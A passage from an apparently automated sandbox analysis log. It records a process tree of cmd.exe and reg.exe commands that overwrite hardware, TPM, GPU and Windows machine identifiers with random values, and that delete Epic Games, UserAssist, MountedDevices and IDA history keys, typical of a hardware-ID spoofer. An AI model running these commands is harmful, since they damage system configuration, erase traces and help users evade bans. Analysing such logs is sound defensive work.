    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:764
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2136
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      PID:2556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2780
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1676
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      Enumerates system info in registry
      PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2840
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-24201-30905-1966216150} /f
      4⤵
      PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1172
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-24201-30905-1966216150} /f
      4⤵
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1364
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-24201 /f
      4⤵
      PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:2288
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 24201 /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 24201 /f
      4⤵
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:992
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-24201 /f
      4⤵
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste24201-30905-19662-1615022872} /f
      4⤵
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1204
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste24201-30905-19662-1615022872} /f
      4⤵
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:780
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24201 /f
      4⤵
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:588
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 24201 /f
      4⤵
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:1792
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 24201 /f
      4⤵
      Modifies registry key
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 24205-8885-4758-7445 /f
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:2576
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste24205-8885-4758-7445 /f
      4⤵
      Modifies registry key
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:3048
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste24205-8885-4758-7445 /f
      4⤵
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste%random% /f
    3⤵
    PID:1416
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste24205 /f
      4⤵
      PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:1608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 24205 /f
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:2692
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 24205 /f
      4⤵
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste%random%-%random%-%random%-%random%} /f
    3⤵
    PID:2128
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste24205-8885-4758-7445} /f
      4⤵
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:2460
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:1376
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 24205-8885-4758-7445419 /f
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:2224
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:2876
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      Modifies registry key
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:3044
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:860
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:2980
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:2812
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      Modifies registry key
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:2996
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:2056
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:1296
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:2896
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1724
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1352
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Modifies registry key
      PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:572
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      Modifies registry key
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:992
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2008
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      Modifies registry key
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:292
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1204
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:2320
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:1508
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      PID:840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:1868
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:984
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:2416
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:1836
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:1528
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      Modifies registry key
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2492
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 24205888547587445419206175140177119313262202375124829 /f
      4⤵
      Modifies registry class
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2092
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1488
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-24205-8885-47587445 /f
      4⤵
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:2328
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1588
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-24208-19633-2262231508 /f
      4⤵
      PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2604
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-24208-19633-2262231508 /f
      4⤵
      PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:860
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:1448
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:2780
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:2316
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:1676
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:2280
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:2080
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:3000
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:772
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 2420819633226223150810734245448252316123056200722360324873 /f
      4⤵
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1088
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 24208196332262231508107342454482523161230562007223603 /f
      4⤵
      Modifies registry class
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 242081963322622315081073424544825231612305620072 /f
      4⤵
      Modifies registry key
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2008
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 2420819633226223150810734245448252316123056200722360324873 /f
      4⤵
      PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:904
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 2420819633226223150810734245448252316123056200722360324873 /f
      4⤵
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1204
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2420819633226223150810734245448252316123056 /f
      4⤵
      Modifies Internet Explorer settings
      PID:2184
- - C:\Windows\system32\cmd.exe
